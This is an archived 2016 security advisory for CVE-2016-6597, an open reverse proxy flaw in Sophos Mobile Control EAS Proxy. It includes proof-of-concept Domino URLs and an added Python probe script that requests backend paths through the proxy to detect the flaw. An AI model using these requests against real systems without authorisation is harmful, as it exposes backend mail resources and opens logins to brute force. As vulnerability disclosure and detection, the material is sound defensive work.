Open Source and information security mailing list archives
Message-ID: <OF48A1B699.CB2A7665-ONC1258006.00315EF1-C1258006.0032C299@pallas.com>
Date: Fri, 5 Aug 2016 11:14:26 +0200
From: Tim Kretschmann <tim.kretschmann@...las.com>
To: bugtraq@...urityfocus.com
Subject: Sophos Mobile Control EAS Proxy Open Reverse Proxy vulnerability
 (CVE-2016-6597)

Application: Sophos Mobile Control EAS Proxy
Versions Affected: 3.5.0.3
Vendor URL: https://www.sophos.com/
Bugs: Open Reverse Proxy
Sent: 30.06.2016
Reported: 05.07.2016
Vendor response: 13.07.2016
Published BugFix by vendor: 28.07.2016 
Date of Public Advisory: 05.08.2016
Reference: Sophos Case #6061906
Author: Tim Kretschmann (Pallas GmbH)
Version and State of report: 0.9 (PrePublic)


Description


1. ADVISORY INFORMATION

Title: Sophos Mobile Control EAS Proxy Open Reverse Proxy vulnerability
Risk: high
Advisory URL: 
https://www.pallas.com/advisories/sophos_eas_open_reverse_proxy_vulnerability
Date published: 05.08.2016
Vendors contacted: Sophos


2. VULNERABILITY INFORMATION

Impact: unauthenticated access to any web resource of the backend mail 
system, if the Lotus Traveler option is enabled
Remotely Exploitable: Yes
Locally Exploitable: No
CVE: CVE-2016-6597 
CVSS Base Score v3.0: 8.6 / 10
CVSS Base Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N


3. VULNERABILITY DESCRIPTION

Sophos EAS Proxy is part of the Enterprise Mobility Management (EMM) 
platform Sophos Mobile Control. It is placed in front of the mail server 
and controls Exchange ActiveSync (EAS) mail access for managed mobile 
devices.
If the Lotus Traveler option is enabled, the proxy does not restrict the 
forwarded URLs to the ActiveSync endpoint but acts as an open reverse 
proxy: unauthenticated remote attackers can reach any web resource of the 
backend mail system, such as Microsoft Exchange or IBM Domino. Since the 
backend's own login is exposed through the proxy, brute force attacks 
against user accounts of the backend mail system are also possible.


4. VULNERABLE PACKAGES

Sophos Mobile Control EAS Proxy Version 3.5.0.3
Other versions are probably affected too, but they were not checked.


5. SOLUTIONS AND WORKAROUNDS

Solution: Update to "Sophos Mobile Control EAS Proxy 6.2.0.exe"
Workaround: Disable the Lotus Traveler option if possible; otherwise 
limit access to the web resources of the backend mail system that are 
reachable through the proxy


6. AUTHOR

Tim Kretschmann (Pallas GmbH)


7. TECHNICAL DESCRIPTION

Proof of Concept for IBM Domino
https://<PublicIP_of_EASProxy>:<Port_of_EASProxy>/da.nsf
https://<PublicIP_of_EASProxy>:<Port_of_EASProxy>/dba4.nsf
https://<PublicIP_of_EASProxy>:<Port_of_EASProxy>/homepage.nsf 
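The following probe script is an added example written for this page; it is not part of the original advisory or of any Sophos or Pallas tooling. It requests the three Domino database paths from the proof of concept above through the EAS proxy, together with the ActiveSync endpoint as a control, and classifies each answer by whether the backend (not the proxy) produced it. The response markers used to recognise a Domino backend, the assumption that a blocked path yields 403/404 and that a proxied one yields 200 or a 401 Basic challenge from the backend, and the hostname in the usage line are all assumptions of this example.

```python
"""eas_probe.py: check an EAS proxy for open-reverse-proxy behaviour.

Added example for CVE-2016-6597; not code from the advisory or the vendor.
Usage: python3 eas_probe.py https://<PublicIP_of_EASProxy>:<Port_of_EASProxy>
"""
import ssl
import sys
import urllib.error
import urllib.request
from urllib.parse import urljoin

# Domino database paths taken from the advisory's proof of concept.
# A mail proxy has no reason to forward any of them.
DOMINO_PROBE_PATHS = ["/da.nsf", "/dba4.nsf", "/homepage.nsf"]

# Control path: the one endpoint an EAS proxy legitimately forwards.
EAS_PATH = "/Microsoft-Server-ActiveSync"

# Assumed body fingerprints that indicate a Domino server answered.
DOMINO_MARKERS = (b"Domino", b"Lotus", b"names.nsf", b"/icons/ecblank.gif")


def classify(status, headers, body):
    """Classify one response as 'forwarded', 'blocked' or 'unknown'.

    forwarded: the backend answered, either with content carrying a Domino
               marker or with its own 401 Basic challenge (the same
               challenge an attacker would brute force through the proxy).
    blocked:   the proxy refused the path (403/404), which is the
               behaviour expected from a properly restricted EAS proxy.
    """
    hdrs = {k.lower(): v for k, v in headers.items()}
    if status == 200 and any(marker in body for marker in DOMINO_MARKERS):
        return "forwarded"
    if status == 401 and "www-authenticate" in hdrs:
        return "forwarded"
    if status in (403, 404):
        return "blocked"
    return "unknown"


def fetch(base_url, path, timeout=10):
    """GET base_url + path; return (status, headers, first 4 KiB of body).

    Certificate verification is disabled on purpose: EAS proxies are
    frequently deployed with self-signed certificates (assumption).
    """
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    req = urllib.request.Request(urljoin(base_url, path),
                                 headers={"User-Agent": "eas-probe/0.1"})
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
            return resp.getcode(), dict(resp.headers), resp.read(4096)
    except urllib.error.HTTPError as err:
        # 401/403/404 arrive here; the error object still carries the response.
        return err.code, dict(err.headers), err.read(4096)


def probe(base_url, fetcher=fetch):
    """Probe every path and return {path: classification}.

    `fetcher` is injectable so the logic can be exercised without a network.
    """
    results = {}
    for path in DOMINO_PROBE_PATHS + [EAS_PATH]:
        status, headers, body = fetcher(base_url, path)
        results[path] = classify(status, headers, body)
    return results


def is_open_proxy(results):
    """True if any non-ActiveSync path was answered by the backend."""
    return any(results[p] == "forwarded" for p in DOMINO_PROBE_PATHS)


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit(__doc__)
    findings = probe(sys.argv[1])
    for path, verdict in findings.items():
        print(f"{verdict:10s} {path}")
    print("VULNERABLE: proxy forwards arbitrary backend paths"
          if is_open_proxy(findings) else "not vulnerable to this check")
```

A 'forwarded' verdict on any of the .nsf paths reproduces the advisory's finding; a fixed or correctly restricted proxy should report 'blocked' for them while the ActiveSync control path still reaches the backend.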


8. ABOUT Pallas GmbH 

Pallas GmbH, located in Germany, provides managed and hosting services 
with a focus on security. 
Address: Pallas GmbH, Hermuelheimer Str. 8a, 50321 Bruehl, GERMANY
Phone: 0049.2232.18960



--------------------------------------------------------------------
//// pallas
Pallas GmbH / Hermülheimer Str. 8a / 50321 Brühl
Managing director: Stephan Sachweh
Commercial register HRB 52019, Cologne local court (Amtsgericht Köln)
--------------------------------------------------------------------
Managed Service - Simply secure
